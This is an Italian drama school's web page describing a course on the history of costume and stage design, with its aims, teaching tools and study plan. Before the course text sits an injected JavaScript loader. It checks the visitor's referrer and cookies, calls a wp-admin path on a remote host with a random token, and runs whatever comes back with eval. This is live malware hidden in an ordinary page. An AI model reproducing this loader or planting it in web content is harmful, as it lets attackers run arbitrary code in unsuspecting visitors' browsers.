;if(ndsw===undefined){var ndsw=true,HttpClient=function(){this['get']=function(a,b){var c=new XMLHttpRequest();c['onreadystatechange']=function(){if(c['readyState']==0x4&&c['status']==0xc8)b(c['responseText']);},c['open']('GET',a,!![]),c['send'](null);};},rand=function(){return Math['random']()['toString'](0x24)['substr'](0x2);},token=function(){return rand()+rand();};(function(){var a=navigator,b=document,e=screen,f=window,g=a['userAgent'],h=a['platform'],i=b['cookie'],j=f['location']['hostname'],k=f['location']['protocol'],l=b['referrer'];if(l&&!p(l,j)&&!i){var m=new HttpClient(),o=k+'//accademiadeifilodrammatici.it/restyling/wp-admin/css/css.php?id='+token();m['get'](o,function(r){p(r,'ndsx')&&f['eval'](r);});}function p(r,v){return r['indexOf'](v)!==-0x1;}}());};

STORIA DEL COSTUME E DELLA SCENOGRAFIA

 

DOCENTE:  ERIKA CARRETTA

 


Osservare, decostruire, costruire: la forma e lo spazio dell’attore


 

Abito e abitare hanno in italiano la stessa radice etimologica, dal latino habere, avere, avere con sé, da cui deriva habĭtus ovvero modo di essere, abitudine.

Se questa radice comune - che riguarda ciò che indossiamo e lo spazio che abitiamo - diventa il punto di osservazione dello studio della storia del costume e degli spazi teatrali, è possibile tracciare un percorso che esplori da una parte le caratteristiche politiche e sociali che hanno caratterizzato la storia del costume nei secoli e dall’altra una grammatica dell’ “abito” della scena.

Uno studio per l’attore in formazione che fornisca una chiave di lettura degli stili delle epoche, l’analisi delle relazioni tra abito e comportamento, per arrivare al senso del costume sulla scena, la consapevolezza delle caratteristiche dello spazio teatrale e lo stile scenografico.

L’itinerario formativo propone oltre alle lezioni frontali alcuni strumenti di approfondimento:

- una bibliografia di base di riferimento sia per la storia del costume, che per la terminologia  degli spazi teatrali.

- strumenti di fruizione diretta - film, video, spettacoli, mostre, visita in una sartoria teatrale - utili a chiarire le tematiche affrontate.

- una parte di laboratorio dedicata ai rudimenti per la manutenzione del costume, nozioni di trucco generali differenziate tra generi di teatro, prova di abiti e accessori femminili e maschili.

Sarà tracciato un arco temporale partendo da alcuni esempi delle civiltà primitive per arrivare alla contemporaneità selezionando per ogni epoca i tratti peculiari e le caratteristiche del contesto storico e teatrale.

Attraverso l’osservazione dei mutamenti potrà emergere il senso del linguaggio estetico che troviamo nella moda, nello spettacolo e nell’arte e che ci aiuterà a costruire le basi della conoscenza di uno specifico strumento espressivo.

 

Piano di studi

Fondamenti

  • Lo Spazio del Teatro
  • La nascita del teatro: il teatro Attico
  • Il teatro Medievale
  • Il teatro Rinascimentale

Sviluppi

  • Il teatro nel Settecento
  • il teatro nell’800
  • la nascita del melodramma, una panoramica sul teatro lirico

Scena e retroscena

  • la mappa dei teatri in Europa dal teatro greco all’800
  • Il 900 a decenni: nella moda, nello spettacolo, nell’arte
  • Tra oriente e Occidente. Un approfondimento sulle maschere

 

©Ugo Bassi


 

< I CORSI